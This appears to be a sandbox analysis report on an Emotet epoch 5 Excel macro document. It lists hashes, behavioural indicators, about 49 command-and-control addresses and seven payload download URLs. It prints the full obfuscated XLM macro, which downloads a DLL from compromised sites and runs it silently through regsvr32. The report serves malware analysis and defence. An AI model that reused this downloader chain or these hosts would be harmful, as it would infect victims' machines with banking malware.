General
-
Target
Notice-2103.xlsm
-
Size
35KB
-
Sample
220320-199sasgfeq
-
MD5
b3064579f7a7325f5eafbf8ec83c77c3
-
SHA1
413532da5c57724f4fde1532329f18abcf528bfb
-
SHA256
58213c653d7d4793d62f2eed00abc0ede74d74b36daee6214dda25fad3c4a2de
-
SHA512
0798c5aee103927e5c0ae7853c357ea0cefc5832de44a5ebb0cd8a43636fd95a498c390062d13c5bd4aa479c7d765c8af4e356fe0820707c01f55aa6c3b9ecee
Behavioral task
behavioral1
Sample
Notice-2103.xlsm
Resource
win7-20220311-en
Malware Config
Extracted (second-stage download URLs; each one is the de-concatenated form of the `&`-split strings in the XLM formulas listed below)
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
-
formulas (Excel 4.0 / XLM macro sheet, as extracted). The download URLs are split across `&` string concatenations so the complete URL never appears in a single cell; every CALL writes the payload to the relative path `..\xdha.ocx`, and the final `=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")` loads it through regsvr32 with the silent flag. Each `=IF('EGVSBSR'!Cnn<0, CALL(...))` step appears to try the next URL only when the preceding download did not succeed, and `=IF('EGVSBSR'!C28<0,CLOSE(0),)` closes the workbook if all of them failed — confirm the referenced cells hold the CALL return values.
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://c"&"asin"&"ojack"&"po"&"tki"&"ng.co"&"m/cg"&"i-bi"&"n/47s"&"Kbk"&"lS"&"Qf"&"31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://d"&"en"&"talto"&"get"&"her.c"&"om/w"&"p-co"&"nt"&"en"&"t/YNs"&"c"&"IH7jp"&"wh9t"&"wP"&"hW"&"ol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://di"&"rec"&"tor"&"ka"&"y.c"&"om.n"&"g/w"&"p-ad"&"mi"&"n/MY"&"P3"&"NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://d"&"eat"&"rav"&"el.a"&"l/w"&"p-i"&"n"&"clu"&"de"&"s/H5"&"44"&"R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ri"&"zw"&"an"&"su"&"le"&"hri"&"a.c"&"om/c"&"gi-b"&"in/Hf"&"Rb"&"Jzbr"&"gq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ra"&"ss"&"ti.c"&"om/F"&"ox-S"&"S/uJK"&"pjP"&"0kS"&"fD"&"QtF"&"Bw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://w"&"w"&"w.m"&"v-b"&"urg"&"en"&"la"&"nd.a"&"t/w"&"p-ad"&"m"&"in/Rc9"&"nu"&"Jg"&"ma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
Extracted
emotet (family)
Epoch5 (botnet epoch; the IP:port entries that follow are the C2 addresses carved from the extracted Emotet configuration)
80.211.107.116:8080
188.166.229.148:443
121.78.112.42:8080
185.148.168.15:8080
210.57.209.142:8080
194.9.172.107:8080
139.196.72.155:8080
128.199.192.135:8080
62.171.178.147:8080
103.133.214.242:8080
104.131.62.48:8080
103.41.204.169:8080
54.37.106.167:8080
217.182.143.207:443
185.148.168.220:8080
202.134.4.210:7080
198.199.98.78:8080
5.56.132.177:8080
66.42.57.149:443
78.46.73.125:443
191.252.103.16:80
54.37.228.122:443
88.217.172.165:8080
190.90.233.66:443
68.183.93.250:443
85.25.120.45:8080
78.47.204.80:443
93.104.209.107:8080
37.59.209.141:8080
159.69.237.188:443
207.148.81.119:8080
185.168.130.138:443
87.106.97.83:7080
45.71.195.104:8080
196.44.98.190:8080
195.77.239.39:8080
36.67.23.59:443
103.82.248.59:7080
203.153.216.46:443
37.44.244.177:8080
116.124.128.206:8080
2.58.16.87:8080
202.28.34.99:8080
118.98.72.86:443
59.148.253.194:443
54.38.242.185:443
85.214.67.203:8080
195.154.146.35:443
103.42.58.120:7080
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
Targets
-
-
Target
Notice-2103.xlsm
-
Size
35KB
-
MD5
b3064579f7a7325f5eafbf8ec83c77c3
-
SHA1
413532da5c57724f4fde1532329f18abcf528bfb
-
SHA256
58213c653d7d4793d62f2eed00abc0ede74d74b36daee6214dda25fad3c4a2de
-
SHA512
0798c5aee103927e5c0ae7853c357ea0cefc5832de44a5ebb0cd8a43636fd95a498c390062d13c5bd4aa479c7d765c8af4e356fe0820707c01f55aa6c3b9ecee
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro; here it is consistent with the extracted `=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")` formula launching regsvr32.exe from Excel.
-
Downloads MZ/PE file (the payload fetched with URLDownloadToFileA into `..\xdha.ocx`; the .ocx extension is cosmetic — it is registered and loaded as a DLL by regsvr32)
-
Loads dropped DLL
-
Drops file in System32 directory
-